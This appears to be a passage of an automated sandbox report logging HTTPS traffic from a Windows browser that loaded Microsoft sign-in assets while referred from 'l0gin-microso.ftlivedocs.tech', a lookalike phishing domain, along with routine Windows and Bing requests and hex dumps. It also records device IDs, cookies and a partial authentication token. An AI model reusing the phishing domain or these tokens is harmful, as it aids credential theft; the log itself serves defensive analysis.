                                                                                                                              2024-10-04 13:11:16 UTC16384INData Raw: 19 bb cd 17 f0 ef de f3 f6 f9 b2 b5 d7 7c 4e 0e b1 1f 36 e9 cf 0b fc b7 7d 4c 89 36 e5 f4 9a 94 e0 c7 fe 7a 3d 4e 40 b1 17 cf 5f e0 bf 2f 5e f4 37 e9 cf 0f 17 f7 e7 cb 53 30 14 ce e0 cf c9 0f a7 f8 ef c9 29 03 db 2f 08 78 8c 4d c1 9f 0e 43 3b 54 f4 74 b7 b3 49 7f 8e 09 fa 43 b7 49 65 9b 2d fc b7 cd 35 76 5f 5c 6c d3 a8 db 5f 23 2a cd c3 eb 78 7e f9 3a 18 46 09 d3 b1 83 c4 33 19 a7 51 5e c4 73 7a b4 81 b3 bb 4e f6 87 b8 48 22 ce d8 61 4a 77 7e bf 61 60 fd 83 c6 70 c7 3d 2a 24 65 3c ff 29 b8 05 65 8f 7e 92 28 a6 5f 03 b4 d0 e7 83 d6 01 a5 0e c3 03 62 c3 7e 07 64 3f 28 18 c0 de 59 28 e5 2a 95 c2 ad 0c bd 87 9b 9b 73 ef 0b 6e ef 4a 82 41 c5 98 db 07 16 9f 8d 40 26 e0 7b 08 5b f9 65 bc f8 90 5e 46 b8 dc fc 3e ee 76 a9 47 45 07 5c 78 b3 e5 cd 1b 0d e3 f9 ca 0c
                                                                                                                              Data Ascii: |N6}L6z=N@_/^7S0)/xMC;TtICIe-5v_\l_#*x~:F3Q^szNH"aJw~a`p=*$e<)e~(_b~d?(Y(*snJA@&{[e^F>vGE\x
                                                                                                                              2024-10-04 13:11:16 UTC3212INData Raw: 38 5d 1d 96 55 52 b0 ee 65 51 a5 80 82 a6 5f a3 d8 a6 8c a4 8c 2d e9 61 bf de 76 31 e7 b5 b7 35 ec ae ac a0 fd 7a 5a e0 51 85 64 9c 71 86 da 05 75 05 e2 2f c1 e3 1b 2e e0 ac 2b f3 db b5 61 3f 28 3c f2 32 68 91 01 35 d9 bf 91 79 ee 76 ca 31 5d 87 e6 ce b3 68 e5 9d 9d 2e 03 be 71 96 2f 47 c1 de 90 b1 6d de b2 47 e1 bd a3 cd 0e 87 4e c4 50 4c ad 76 42 79 13 eb d1 84 ba 89 a8 ec 51 f8 46 ef 45 5e 59 6d ae 8d 02 82 52 f5 51 9c a3 01 35 fe 52 6d 5e eb b5 46 a5 5a 61 3a 08 21 bc 5e 6d 35 58 78 bd 56 2c 36 30 9c 5e 86 cf 75 f6 7b 81 77 02 f8 55 8d 84 b0 cc 45 ca d8 44 7f 89 74 f2 8a 88 52 95 62 2a a5 20 69 a9 dc a0 a0 52 ad a5 a2 81 21 b3 5b 2a a1 61 96 92 ca fe c5 54 63 90 d5 37 2a 4e bc 5d 53 05 b2 91 97 6a d4 5c e7 b2 d7 69 fe 72 6e 06 bd 93 76 bf 82 ed 7e 78
                                                                                                                              Data Ascii: 8]UReQ_-av15zZQdqu/.+a?(<2h5yv1]h.q/GmGNPLvByQFE^YmRQ5Rm^FZa:!^m5XxV,60^u{wUEDtRb* iR![*aTc7*N]Sj\irnv~x


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              66192.168.2.174984113.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:16 UTC667OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:16 UTC799INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:16 GMT
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Content-Length: 621
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                                              ETag: 0x8DB5C3F49ED96E0
                                                                                                                              x-ms-request-id: 73ae05e7-d01e-0057-22bd-116d65000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131116Z-15767c5fc55qdcd62bsn50hd6s0000000cag00000000es4q
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:16 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                                                                                              Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              67192.168.2.174984313.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:17 UTC418OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:17 UTC778INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:17 GMT
                                                                                                                              Content-Type: image/svg+xml
                                                                                                                              Content-Length: 621
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                                              ETag: 0x8DB5C3F49ED96E0
                                                                                                                              x-ms-request-id: 73ae05e7-d01e-0057-22bd-116d65000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131117Z-15767c5fc55jdxmppy6cmd24bn00000004rg00000000gggc
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:17 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                                                                                              Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              68192.168.2.174984413.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:17 UTC439OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:17 UTC812INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:17 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 35168
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Thu, 15 Aug 2024 17:52:55 GMT
                                                                                                                              ETag: 0x8DCBD5317AEB807
                                                                                                                              x-ms-request-id: b9620ef8-901e-0037-449c-112e57000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131117Z-15767c5fc55v7j95gq2uzq37a00000000cug000000008rpf
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:17 UTC15572INData Raw: 1f 8b 08 00 00 00 00 00 04 00 c4 bd 6b 43 db 48 b2 30 fc fd f9 15 e0 9d 65 ac b5 00 df 30 18 70 58 06 92 49 76 33 93 9c 5c 66 cf 2e 30 59 59 96 6d 0d b2 65 24 99 4b 02 cf 6f 7f eb d2 97 6a c9 90 cc 9c 67 df 33 e7 6c 70 57 df aa ab ab ab ab aa ab 5b db 7f 59 ff 3f 6b 7f 59 db fc f6 ff d6 de 7f 38 7e f7 61 ed cd 8b b5 0f 2f 5f bd 3b 5d 7b 0b a9 7f ae fd fc e6 c3 ab 93 e7 df de 0e 76 8a ff fb 30 8d f3 b5 71 9c 44 6b f0 77 18 e4 d1 68 2d 9d af a5 d9 5a 3c 0f d3 6c 91 66 41 11 e5 6b 33 f8 37 8b 83 64 6d 9c a5 b3 b5 62 1a ad 2d b2 f4 b7 28 2c f2 b5 24 ce 0b a8 34 8c 92 f4 66 ad 0e cd 65 a3 b5 b7 41 56 dc ad bd 7a eb 6d 41 fb 11 b4 16 4f e2 39 d4 0e d3 c5 1d fc 9e 16 6b f3 b4 88 c3 68 2d 98 8f a8 b5 04 12 f3 3c 5a 5b ce 47 51 b6 76 33 8d c3 e9 da 4f 71 98 a5 79
                                                                                                                              Data Ascii: kCH0e0pXIv3\f.0YYme$Kojg3lpW[Y?kY8~a/_;]{v0qDkwh-Z<lfAk37dmb-(,$4feAVzmAO9kh-<Z[GQv3Oqy
                                                                                                                              2024-10-04 13:11:17 UTC16384INData Raw: 19 bb cd 17 f0 ef de f3 f6 f9 b2 b5 d7 7c 4e 0e b1 1f 36 e9 cf 0b fc b7 7d 4c 89 36 e5 f4 9a 94 e0 c7 fe 7a 3d 4e 40 b1 17 cf 5f e0 bf 2f 5e f4 37 e9 cf 0f 17 f7 e7 cb 53 30 14 ce e0 cf c9 0f a7 f8 ef c9 29 03 db 2f 08 78 8c 4d c1 9f 0e 43 3b 54 f4 74 b7 b3 49 7f 8e 09 fa 43 b7 49 65 9b 2d fc b7 cd 35 76 5f 5c 6c d3 a8 db 5f 23 2a cd c3 eb 78 7e f9 3a 18 46 09 d3 b1 83 c4 33 19 a7 51 5e c4 73 7a b4 81 b3 bb 4e f6 87 b8 48 22 ce d8 61 4a 77 7e bf 61 60 fd 83 c6 70 c7 3d 2a 24 65 3c ff 29 b8 05 65 8f 7e 92 28 a6 5f 03 b4 d0 e7 83 d6 01 a5 0e c3 03 62 c3 7e 07 64 3f 28 18 c0 de 59 28 e5 2a 95 c2 ad 0c bd 87 9b 9b 73 ef 0b 6e ef 4a 82 41 c5 98 db 07 16 9f 8d 40 26 e0 7b 08 5b f9 65 bc f8 90 5e 46 b8 dc fc 3e ee 76 a9 47 45 07 5c 78 b3 e5 cd 1b 0d e3 f9 ca 0c
                                                                                                                              Data Ascii: |N6}L6z=N@_/^7S0)/xMC;TtICIe-5v_\l_#*x~:F3Q^szNH"aJw~a`p=*$e<)e~(_b~d?(Y(*snJA@&{[e^F>vGE\x
                                                                                                                              2024-10-04 13:11:17 UTC3212INData Raw: 38 5d 1d 96 55 52 b0 ee 65 51 a5 80 82 a6 5f a3 d8 a6 8c a4 8c 2d e9 61 bf de 76 31 e7 b5 b7 35 ec ae ac a0 fd 7a 5a e0 51 85 64 9c 71 86 da 05 75 05 e2 2f c1 e3 1b 2e e0 ac 2b f3 db b5 61 3f 28 3c f2 32 68 91 01 35 d9 bf 91 79 ee 76 ca 31 5d 87 e6 ce b3 68 e5 9d 9d 2e 03 be 71 96 2f 47 c1 de 90 b1 6d de b2 47 e1 bd a3 cd 0e 87 4e c4 50 4c ad 76 42 79 13 eb d1 84 ba 89 a8 ec 51 f8 46 ef 45 5e 59 6d ae 8d 02 82 52 f5 51 9c a3 01 35 fe 52 6d 5e eb b5 46 a5 5a 61 3a 08 21 bc 5e 6d 35 58 78 bd 56 2c 36 30 9c 5e 86 cf 75 f6 7b 81 77 02 f8 55 8d 84 b0 cc 45 ca d8 44 7f 89 74 f2 8a 88 52 95 62 2a a5 20 69 a9 dc a0 a0 52 ad a5 a2 81 21 b3 5b 2a a1 61 96 92 ca fe c5 54 63 90 d5 37 2a 4e bc 5d 53 05 b2 91 97 6a d4 5c e7 b2 d7 69 fe 72 6e 06 bd 93 76 bf 82 ed 7e 78
                                                                                                                              Data Ascii: 8]UReQ_-av15zZQdqu/.+a?(<2h5yv1]h.q/GmGNPLvByQFE^YmRQ5Rm^FZa:!^m5XxV,60^u{wUEDtRb* iR![*aTc7*N]Sj\irnv~x


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              69192.168.2.174984520.190.159.2443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:35 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/soap+xml
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 4808
                                                                                                                              Host: login.live.com
                                                                                                                              2024-10-04 13:11:35 UTC4808OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-10-04 13:11:36 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Fri, 04 Oct 2024 13:10:35 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_SN1
                                                                                                                              x-ms-request-id: c456318d-4265-48ae-ad08-f513af25137d
                                                                                                                              PPServer: PPV: 30 H: SN1PEPF0003FB3D V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:35 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 11177
                                                                                                                              2024-10-04 13:11:36 UTC11177INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              70192.168.2.174984613.107.5.88443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:36 UTC537OUTGET /ab HTTP/1.1
                                                                                                                              Host: evoke-windowsservices-tas.msedge.net
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              X-PHOTOS-CALLERID: 9NMPJ99VJBWV
                                                                                                                              X-EVOKE-RING:
                                                                                                                              X-WINNEXT-RING: Public
                                                                                                                              X-WINNEXT-TELEMETRYLEVEL: Basic
                                                                                                                              X-WINNEXT-OSVERSION: 10.0.19045.0
                                                                                                                              X-WINNEXT-APPVERSION: 1.23082.131.0
                                                                                                                              X-WINNEXT-PLATFORM: Desktop
                                                                                                                              X-WINNEXT-CANTAILOR: False
                                                                                                                              X-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}
                                                                                                                              X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=
                                                                                                                              If-None-Match: 2056388360_-1434155563
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              2024-10-04 13:11:36 UTC209INHTTP/1.1 400 Bad Request
                                                                                                                              X-MSEdge-Ref: Ref A: FBC9BB9AF2BA44BAB00EB1C36C62D414 Ref B: EWR311000107051 Ref C: 2024-10-04T13:11:36Z
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:35 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              71192.168.2.17498472.23.209.133443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:36 UTC2595OUTGET /client/config?cc=CH&setlang=en-CH HTTP/1.1
                                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                              X-UserAgeClass: Unknown
                                                                                                                              X-BM-Market: CH
                                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                                              X-Device-OSSKU: 48
                                                                                                                              X-BM-DTZ: -240
                                                                                                                              X-DeviceID: 01000A41090080B6
                                                                                                                              X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                              X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time
                                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                                              X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAbIzB0A4h2D%2BNkHrVkQylh58%2BvwMN/s6obbwPIDvP8RId7%2B52mg6j96NqltBLmSJDZq7dpan/Biy4iI94XRRBsKCwcQnYCkLPOqnjz8HPQwbOUE8Z1jVHWhD5RDayAmqSOaVYKZaqyvHF0Sbv7B6HLy1wh1STiGG8DdEISAuVtusyELKMwv7OLxWUZnZHDsm5ow0olTWYecTmkPOEw9B6plzponbdE%2BWd5JOar5hhsREUVwj6rVk2E2CX6pjwCdqrcUea1pn1cWWQNIc/IR/AZjod6v1bK9MiQXyhpG3or9vWDY62DKBleAo7GizRpXE%2BiCiOffEzOnWGviCSWajBi0QZgAAEM5S7DwxrwApMATd2WxVp%2BOwAZe1pwhoFYCyynam8KnopJ9vBSxTxxklQ1FROTdoEkZKx6JFCTcja4kqEh6US0eitvQbSqciLfwThHUrPrU/lBONghJO0/Os7D4evM374mWxI2PBgVfFuNR/Sm3CEB0Z4m/A%2B1UROyD6JVrVwbg8l1sFgfqSzvoElbGJyDztj9F/ntgpEX5klsqOFmA46%2BGcN%2BR242lQeArgSmStNBHstuGpa3JVd%2BFDN7XviS3AbKyPh/2E7G1m9VvFb5F76R1HUgzEvUyjUfFYL2CqJ32x2v0d3BGK4NNqLVo/tI%2BAaeAe1uLdM0Gcv2%2Bitf5%2BXvpvxojy9x7tTbQWWbomh5%2BgbwkmCye3SpUDCk2olN95yNqlaRBxFR4PxrYUGYITBj8%2BdQPhLChw9I2AIvPuEhO8eR8tqnk9/ROZe%2Bu9Iuxwr665N0M%2B/W6S37jrp%2Bgr0E1kU/dKfZL6dXH8oVdI/m4CXJS%2Bnw/kLEZhrVeU/lULXiX0hZQCYIEIsQ0Phgt/mQSb6yFidBHH1eLCfLOZAqAaH18vzs9mUepvhTOiCZ0 [TRUNCATED]
                                                                                                                              X-Agent-DeviceId: 01000A41090080B6
                                                                                                                              X-BM-CBT: 1728047494
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                              X-Device-isOptin: false
                                                                                                                              Accept-language: en-GB, en, en-US
                                                                                                                              X-Device-Touch: false
                                                                                                                              X-Device-ClientSession: 2578F7F661CB4F88B6597755BC50BB4A
                                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                              Host: www.bing.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                                                                                                              2024-10-04 13:11:37 UTC1147INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 2215
                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                              Cache-Control: private
                                                                                                                              X-EventID: 66ffe988ccc24296b05c9e79c7d2583e
                                                                                                                              X-AS-SetSessionMarket: de-ch
                                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:37 GMT
                                                                                                                              Connection: close
